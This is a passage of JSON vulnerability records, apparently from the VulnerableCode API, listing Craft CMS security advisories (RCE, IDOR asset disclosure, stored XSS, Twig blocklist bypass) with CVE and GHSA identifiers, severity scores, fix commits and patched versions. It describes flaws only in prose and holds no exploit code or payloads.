/VCID-rb7c-3nkc-gkeg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91012?format=json","vulnerability_id":"VCID-rzq4-h1ms-nqef","summary":"Craft CMS vulnerable to behavior injection RCE in ElementIndexesController and FieldsController\nThe fix for https://github.com/advisories/GHSA-7jx7-3846-m7w7 (commit https://github.com/craftcms/cms/commit/395c64f0b80b507be1c862a2ec942eaacb353748) only patched `src/services/Fields.php`, but the same vulnerable pattern exists in `ElementIndexesController` and `FieldsController`.\n\nExploitation requires Craft control panel administrator permissions, and `allowAdminChanges` must be enabled.\n\nAn attacker can use the same gadget chain from the original advisory to achieve RCE.\n\nUsers should update to Craft 4.17.5 and 5.9.11 to mitigate the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32264","reference_id":"","reference_type":"","scores":[{"value":"0.00048","scoring_system":"epss","scoring_elements":"0.15357","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32264"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/78d181e12e0b15e1300f54ec85f19859d3300f70","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T15:20:18Z/"}],"url":"https://github.com/craftcms/cms/commit/78d181e12e0b15e1300f54e
c85f19859d3300f70"},{"reference_url":"https://github.com/craftcms/cms/commit/dfec46362fcb40b330ce8a4d8136446e65085620","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T15:20:18Z/"}],"url":"https://github.com/craftcms/cms/commit/dfec46362fcb40b330ce8a4d8136446e65085620"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-4484-8v2f-5748","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T15:20:18Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-4484-8v2f-5748"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32264","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32264"},{"reference_url":"https://github.com/advisories/GHSA-4484-8v2f-5748","reference_id":"GHSA-4484-8v2f-5748","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-4484-8v2f-5748"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-7jx7-3846-m7w7","reference_id":"GHSA-7jx7-3846-m7w7","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring
_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T15:20:18Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-7jx7-3846-m7w7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113015?format=json","purl":"pkg:composer/craftcms/cms@5.9.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.11"}],"aliases":["CVE-2026-32264","GHSA-4484-8v2f-5748"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rzq4-h1ms-nqef"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91774?format=json","vulnerability_id":"VCID-sa99-8awj-eycd","summary":"Craft CMS: Authorized asset \"preview file\" requests bypass allows users without asset access to retrieve private preview metadata\n### Summary\n\nAn authenticated low-privileged user can call `assets/preview-file` for an asset they are not authorized to view and still receive preview response data (`previewHtml`) for that private asset.\n\nThe returned preview HTML included a private preview image route containing the target private `assetId`, even though `canView` was `false` for the attacker account.\n\n### Details\n\n1. 
`assets/preview-file` accepts an attacker-controlled `assetId` and renders preview output.\n2. The action does not enforce per-asset view authorization prior to returning preview content.\n3. As a result, an authenticated user without asset-view permission can still obtain private preview output.\n\nThis affects Craft installations that hold private assets and have authenticated users of mixed privilege levels.\n\n### Resources\n\n- d30df3112220db1ffd6726a3ed11857014c7fb27\n- b1cddf72c98a","references":[{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/b1cddf72c98a66801beb04ea4b07e72182b7b7db","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/b1cddf72c98a66801beb04ea4b07e72182b7b7db"},{"reference_url":"https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/d30df3112220db1ffd6726a3ed11857014c7fb27"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-44px-qjjc-xrhq","reference_id":"","reference_type":"","scores":[{"value":"1.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},
{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-44px-qjjc-xrhq"},{"reference_url":"https://github.com/advisories/GHSA-44px-qjjc-xrhq","reference_id":"GHSA-44px-qjjc-xrhq","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-44px-qjjc-xrhq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["GHSA-44px-qjjc-xrhq"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sa99-8awj-eycd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50073?format=json","vulnerability_id":"VCID-twuy-wzb7-k7g3","summary":"Craft CMS Vulnerable to Stored XSS in Number Prefix & Suffix Fields\nA stored XSS vulnerability exists in the Number field type settings. 
The Prefix and Suffix fields are rendered using the `|md|raw` Twig filter without proper escaping, allowing script execution when the Number field is displayed on users' profiles.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25496","reference_id":"","reference_type":"","scores":[{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06648","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25496"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/cb5fb0e979e72f315c9178fc031883d49527f513","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:19Z/"}],"url":"https://github.com/craftcms/cms/commit/cb5fb0e979e72f315c9178fc031883d49527f513"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P
/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:19Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25496","reference_id":"CVE-2026-25496","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25496"},{"reference_url":"https://github.com/advisories/GHSA-9f5h-mmq6-2x78","reference_id":"GHSA-9f5h-mmq6-2x78","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9f5h-mmq6-2x78"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-9f5h-mmq6-2x78","reference_id":"GHSA-9f5h-mmq6-2x78","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:30:19Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-9f5h-mmq6-2x78"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VC
ID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25496","GHSA-9f5h-mmq6-2x78"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-twuy-wzb7-k7g3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91375?format=json","vulnerability_id":"VCID-tzjk-x116-ayge","summary":"Craft CMS: Low-privilege users could read private asset contents when editing an asset (IDOR)\n### Summary\n\nA low-privileged authenticated user can read private asset content by calling `assets/edit-image` with an arbitrary `assetId` that they are not authorized to view.\n\nThe endpoint returns image bytes (or a preview redirect) without 
enforcing a per-asset view authorization check, leading to potential unauthorized disclosure of private files.\n\n### Details\n\nRoot cause:\n  - A user-controlled object reference (`assetId`) is used to load and return sensitive content.\n  - The action does not verify whether the current user is authorized to view that asset.\n  - This creates an authenticated IDOR / authorization bypass.\n\n### Impact\n\n- Craft installations where private/non-public assets exist and low-privileged users can authenticate.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/7290d91639e","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33158","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.0389","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33158"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/"}],"url":"https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.8","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/A
V:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.8"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.14","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.14"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-3pvf-vxrv-hh9c","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T20:24:35Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-3pvf-vxrv-hh9c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33158","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33158"},{"reference_url":"https://github.com/advisories/GHSA-3pvf-vxrv-hh9c","reference_id":"GHSA-3pvf-vxrv-hh9c","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-3pvf-vxrv-hh9c"}],"fixed_packages":[{"url":"http://public2
.vulnerablecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["CVE-2026-33158","GHSA-3pvf-vxrv-hh9c"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tzjk-x116-ayge"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50545?format=json","vulnerability_id":"VCID-vasz-rnn1-67ev","summary":"Craft CMS has Twig Function Blocklist Bypass\nCraft CMS implements a blocklist to prevent potentially dangerous PHP functions from being called via Twig non-Closure arrow functions.\n\nIn order to be able to successfully execute this attack, you need to either have `allowAdminChanges` enabled on production, or a compromised admin account, or an account with access to the System Messages utility.\n\nSeveral PHP functions are not included in the blocklist, which could allow malicious actors with the required permissions to execute various types of payloads, including RCEs, arbitrary file reads, SSRFs, and SSTIs.\n\nTwig has already deprecated this behavior, and it will eventually be removed from Twig altogether.\n\nhttps://github.com/twigphp/Twig/blob/946ddeafa3c9f4ce279d1f34051af041db0e16f2/src/Extension/CoreExtension.php#L2096\n\nThis has been resolved in Craft 4.17.0 and 5.9.0, which removes the blocklist and disables all non-Closure arrow functions in Twig globally via the `enableTwigSandbox` config setting. That setting is enabled by default on all new Craft projects; upgrading alone does not enable it on existing projects. 
Existing Craft projects will need to enable the config setting to take advantage of it.\n\nExisting projects should update to the patched versions of 5.9.0 and 4.17.0 to mitigate the issue and enable the config setting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28783","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11182","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28783"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/pull/18208","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:33:33Z/"}],"url":"https://github.com/craftcms/cms/pull/18208"},{"reference_url":"https://github.com/twigphp/Twig/blob/946ddeafa3c9f4ce279d1f34051af041db0e16f2/src/Extension/CoreExtension.php#L2096","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/twigphp/Twig/blob/946ddeafa3c9f4ce279d1f34051af041db0e16f2/src/Extension/CoreExte
nsion.php#L2096"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28783","reference_id":"CVE-2026-28783","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28783"},{"reference_url":"https://github.com/advisories/GHSA-5fvc-7894-ghp4","reference_id":"GHSA-5fvc-7894-ghp4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5fvc-7894-ghp4"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-5fvc-7894-ghp4","reference_id":"GHSA-5fvc-7894-ghp4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:33:33Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-5fvc-7894-ghp4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-g
ug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28783","GHSA-5fvc-7894-ghp4"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vasz-rnn1-67ev"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50074?format=json","vulnerability_id":"VCID-vvhc-rnpr-ubey","summary":"Craft CMS Vulnerable to Stored XSS in Entry Types Name\nStored XSS via Entry Type names. 
The name is not sanitized when displayed in the Entry Types list.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25491","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05719","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25491"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/cfd6ba0e2ce1a59a02d75cae6558c4ace1ab8bd4","reference_id":"","reference_type":"","scores":[{"value":"1.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MP